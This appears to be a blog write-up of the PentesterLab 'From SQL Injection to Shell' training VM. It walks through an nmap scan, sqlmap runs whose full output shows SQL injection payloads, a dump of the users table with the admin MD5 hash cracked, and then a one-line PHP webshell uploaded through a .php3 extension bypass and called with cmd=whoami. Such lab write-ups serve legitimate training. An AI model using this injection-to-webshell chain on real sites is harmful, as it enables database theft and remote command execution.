Tag Archives: sqlmap

PentesterLab – From SQL Injection to Shell

https://pentesterlab.com/exercises/from_sqli_to_shell/course

Note: there are tons of methods to solve it 🙂 I tried the fastest one. Doing everything by “hand” (no tools) will bring the best learning experience, of course.

We have the VM .. now what?

Find its IP :))
Start it, then go to the host and:
nmap -v 10.42.0.* -p 80

Nmap scan report for 10.42.0.6
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

(the VM was set with bridged adapter).

Open it in the browser now. Clicking around will show us a first GET parameter: http://10.42.0.6/cat.php?id=1

Playing with it (add ‘ for example after 1) will generate the known SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

What does that tell us? 😀 .. sqlmap
(of course we can run sqlmap -a -u URL for everything) but for the sake of the exercise lets see it step by step):

sqlmap –tables -u http://10.42.0.6/cat.php?id=1

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:59:27

[08:59:27] [INFO] resuming back-end DBMS 'mysql' 
[08:59:27] [INFO] testing connection to the target URL
[08:59:27] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[08:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[08:59:27] [INFO] fetching database names
[08:59:27] [INFO] fetching tables for databases: 'information_schema, photoblog'
Database: photoblog
[3 tables]
+---------------------------------------+
| categories                            |
| pictures                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

[08:59:27] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 08:59:27

Yuppy, we can the ‘users’ table 🙂 .. lets go for an account.

sqlmap –dump photoblog -u http://10.42.0.6/cat.php?id=1

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:02:52

[09:02:52] [INFO] resuming back-end DBMS 'mysql' 
[09:02:52] [INFO] testing connection to the target URL
[09:02:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[09:02:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[09:02:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:02:52] [INFO] fetching current database
[09:02:52] [INFO] fetching tables for database: 'photoblog'
[09:02:52] [INFO] fetching columns for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: pictures
[3 entries]
+----+-------------+-----+---------+
| id | img         | cat | title   |
+----+-------------+-----+---------+
| 1  | hacker.png  | 2   | Hacker  |
| 2  | ruby.jpg    | 1   | Ruby    |
| 3  | cthulhu.png | 1   | Cthulhu |
+----+-------------+-----+---------+

[09:02:52] [INFO] table 'photoblog.pictures' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/pictures.csv'
[09:02:52] [INFO] fetching columns for table 'users' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'users' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
[09:02:52] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[09:02:57] [INFO] using hash method 'md5_generic_passwd'
[09:02:57] [INFO] resuming password 'P4ssw0rd' for hash '8efe310f9ab3efeae8d410a8e0166eb2' for user 'admin'
[09:02:57] [INFO] postprocessing table dump
Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[09:02:57] [INFO] table 'photoblog.users' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/users.csv'
[09:02:57] [INFO] fetching columns for table 'categories' in database 'photoblog'
[09:02:57] [INFO] fetching entries for table 'categories' in database 'photoblog'
[09:02:57] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: categories
[3 entries]
+----+--------+
| id | title  |
+----+--------+
| 1  | test   |
| 2  | ruxcon |
| 3  | 2010   |
+----+--------+

[09:02:57] [INFO] table 'photoblog.categories' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/categories.csv'
[09:02:57] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 09:02:57

So the account is admin / P4ssw0rd. (md5, no salt)

Note: if sqlmap can’t break the password, use the online tools OR https://github.com/Talanor/findmyhash or whatever else you prefer.

After logging in to the admin side we see an upload field here: http://10.42.0.6/admin/new.php so .. that tells us how to get to the shell .. by uploading a script (webshell).
The easiest one, considering we are running Apache + PHP is .. using exec/passthru/system, whatever you like 🙂

<?php passthru ($_REQUEST['cmd']); ?>

But we will see that it doesn’t allow .php files to be uploaded so try with .php3, .php5 and then access it with the GET/POST parameter payload you want, example:

http://10.42.0.6/admin/uploads/ffff.php3?cmd=whoami

For nicer webshells, check this one out:

https://github.com/epinna/weevely3